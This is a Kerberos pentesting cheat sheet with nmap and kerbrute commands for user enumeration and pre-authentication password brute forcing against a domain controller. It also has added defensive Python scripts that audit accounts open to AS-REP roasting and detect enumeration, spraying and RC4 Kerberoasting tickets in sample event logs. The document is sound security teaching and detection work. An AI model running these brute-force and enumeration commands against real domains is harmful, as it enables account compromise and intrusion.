Kerberos Pentesting

Last modified: 2023-10-30

Tags: Active Directory, Privilege Escalation, Windows

Kerberos is an authentication protocol used to verify the identity of a user or host. It relies on cryptography and consists of three parties: the client, the server, and the Key Distribution Center (KDC). The default port is 88. Kerberos also uses port 464 for password changes.

Enumeration

To enumerate users automatically, you can use nmap.

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local' -p 88 <target-ip>

Brute Force Authentication

Kerbrute is a tool to perform Kerberos pre-auth bruteforcing.
The wordlist (e.g. combos.txt) specified must be the "username:password" combinations.

# -v: verbose mode (recommended; without it we cannot confirm whether a user exists or not)
# --dc: domain controller
# -d: domain
# combos.txt: the wordlist specified must contain "username:password" combinations.
kerbrute bruteforce -v --dc 10.0.0.1 -d example.domain combos.txt

# Users enumeration
kerbrute userenum -v --dc 10.0.0.1 -d example.domain usernames.txt

# Brute force user's password
kerbrute bruteuser -v --dc 10.0.0.1 -d example.domain passwords.txt username

AS-REP Roasting

We might be able to find password hashes of user accounts that do not require pre-authentication.
Please see AS-REP Roasting.
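From the defender's side, the accounts exposed to this are the ones with the DONT_REQ_PREAUTH bit (0x400000) set in userAccountControl. The script below is an added example, not part of the original page: it decodes the userAccountControl bitmask from a constructed directory export, lists the enabled accounts that do not require pre-authentication, and computes the value the attribute should have once the bit is cleared. The account names and values are made up for the example.

```python
"""Audit a directory export for accounts that do not require Kerberos
pre-authentication (AS-REP roastable). Added example; input is constructed."""

# userAccountControl flag bits (subset) as documented for Active Directory.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
FLAG_BY_NAME = {name: bit for bit, name in UAC_FLAGS.items()}

# Constructed export (hypothetical accounts), e.g. from an LDAP dump of
# sAMAccountName and userAccountControl.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "alice", "userAccountControl": 0x200},
    {"sAMAccountName": "bob", "userAccountControl": 0x10200},
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x400200},
    {"sAMAccountName": "old_contractor", "userAccountControl": 0x400202},
]


def decode_uac(value):
    """Return the names of all known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def clear_flag(value, name):
    """Value of userAccountControl after clearing the named flag."""
    return value & ~FLAG_BY_NAME[name]


def find_asrep_roastable(accounts):
    """Enabled accounts with DONT_REQ_PREAUTH set; disabled accounts are
    skipped because the KDC will not issue them a ticket anyway."""
    hits = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        flags = decode_uac(uac)
        if "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags:
            hits.append(acct["sAMAccountName"])
    return hits


def remediation_plan(accounts):
    """Map each roastable account to the userAccountControl value to set."""
    return {
        name: clear_flag(next(a["userAccountControl"] for a in accounts
                              if a["sAMAccountName"] == name), "DONT_REQ_PREAUTH")
        for name in find_asrep_roastable(accounts)
    }


if __name__ == "__main__":
    for name, new_uac in remediation_plan(SAMPLE_ACCOUNTS).items():
        print(f"{name}: clear DONT_REQ_PREAUTH -> userAccountControl={new_uac:#x}")
```

Against a live domain the same check is a single query: the LDAP filter `(userAccountControl:1.2.840.113556.1.4.803:=4194304)` (bitwise AND on 0x400000) or, with the AD module, `Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true'`. Accounts that must keep the flag for a legacy application should at least have a long, random password, since the AS-REP they hand out is crackable offline.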


Kerberoasting Attack

If we have the password of some user, we might be able to obtain other users' credentials.
Please see Kerberoasting Attack.
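The user enumeration and pre-auth brute forcing above, and the ticket requests behind Kerberoasting, all leave traces on the domain controller: failed AS-REQs are logged as event 4768 with result 0x6 (unknown principal) or 4771 with failure code 0x18 (wrong password), and TGS requests are logged as 4769 with the ticket encryption type, where RC4 (0x17) for a non-machine service account is the classic Kerberoasting indicator. The script below is an added detection example, not part of the original page; the log lines are constructed to mimic the Windows Security log fields, and the IPs and account names are invented.

```python
"""Detect Kerberos enumeration / pre-auth brute forcing and RC4 TGS requests
over constructed Windows Security event lines. Added example; data is made up."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. Field names follow the Windows Security log:
# 4768 = TGT requested, 4771 = pre-auth failed, 4769 = service ticket requested.
SAMPLE_EVENTS = """\
2023-10-30T10:00:01Z EventID=4768 TargetUserName=zz01 IpAddress=10.0.0.50 Status=0x6
2023-10-30T10:00:02Z EventID=4768 TargetUserName=zz02 IpAddress=10.0.0.50 Status=0x6
2023-10-30T10:00:03Z EventID=4771 TargetUserName=alice IpAddress=10.0.0.50 Status=0x18
2023-10-30T10:00:04Z EventID=4771 TargetUserName=bob IpAddress=10.0.0.50 Status=0x18
2023-10-30T10:00:05Z EventID=4768 TargetUserName=zz03 IpAddress=10.0.0.50 Status=0x6
2023-10-30T10:00:06Z EventID=4771 TargetUserName=carol IpAddress=10.0.0.50 Status=0x18
2023-10-30T10:00:30Z EventID=4771 TargetUserName=dave IpAddress=10.0.0.77 Status=0x18
2023-10-30T10:01:00Z EventID=4768 TargetUserName=alice IpAddress=10.0.0.20 Status=0x0 TicketEncryptionType=0x12
2023-10-30T10:01:05Z EventID=4769 TargetUserName=alice@EXAMPLE.LOCAL ServiceName=FS01$ IpAddress=10.0.0.20 Status=0x0 TicketEncryptionType=0x12
2023-10-30T10:02:10Z EventID=4769 TargetUserName=bob@EXAMPLE.LOCAL ServiceName=svc_sql IpAddress=10.0.0.50 Status=0x0 TicketEncryptionType=0x17
2023-10-30T10:02:11Z EventID=4769 TargetUserName=bob@EXAMPLE.LOCAL ServiceName=svc_http IpAddress=10.0.0.50 Status=0x0 TicketEncryptionType=0x17
2023-10-30T10:02:12Z EventID=4769 TargetUserName=bob@EXAMPLE.LOCAL ServiceName=krbtgt IpAddress=10.0.0.50 Status=0x0 TicketEncryptionType=0x17
"""

# (EventID, Status) pairs that indicate a failed AS-REQ.
FAIL_CODES = {
    ("4768", "0x6"): "unknown user (KDC_ERR_C_PRINCIPAL_UNKNOWN)",
    ("4771", "0x18"): "wrong password (KDC_ERR_PREAUTH_FAILED)",
}


def parse_event(line):
    """Parse 'timestamp key=value ...' into a dict with a datetime under 'time'."""
    ts, *fields = line.split()
    ev = {"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")}
    for field in fields:
        key, _, value = field.partition("=")
        ev[key] = value
    return ev


def load_sample_events():
    return [parse_event(l) for l in SAMPLE_EVENTS.splitlines() if l.strip()]


def detect_enum_or_spray(events, threshold=5, window=timedelta(minutes=1)):
    """Return {ip: max failures seen in any `window`} for sources that reach
    `threshold` failed AS-REQs; covers both user enumeration (0x6) and
    password guessing (0x18), which an attacker often mixes."""
    by_ip = defaultdict(list)
    for ev in events:
        if (ev.get("EventID"), ev.get("Status")) in FAIL_CODES:
            by_ip[ev["IpAddress"]].append(ev["time"])
    hits = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted times
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                hits[ip] = max(hits.get(ip, 0), count)
    return hits


def detect_rc4_tgs(events):
    """Successful 4769 with RC4 (0x17) for a user service account. Machine
    accounts ($) and krbtgt are skipped: those tickets are not useful to crack."""
    hits = []
    for ev in events:
        if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
            continue
        svc = ev.get("ServiceName", "")
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if ev.get("TicketEncryptionType") == "0x17":
            hits.append((ev["TargetUserName"], svc, ev["IpAddress"]))
    return hits


if __name__ == "__main__":
    evs = load_sample_events()
    print("AS-REQ failure bursts:", detect_enum_or_spray(evs))
    print("RC4 service tickets:", detect_rc4_tgs(evs))
```

The thresholds are deliberately low for the sample; in production they are tuned per environment, and the RC4 rule is far less noisy once AES is enforced on service accounts (msDS-SupportedEncryptionTypes), because a client that still asks for RC4 then stands out.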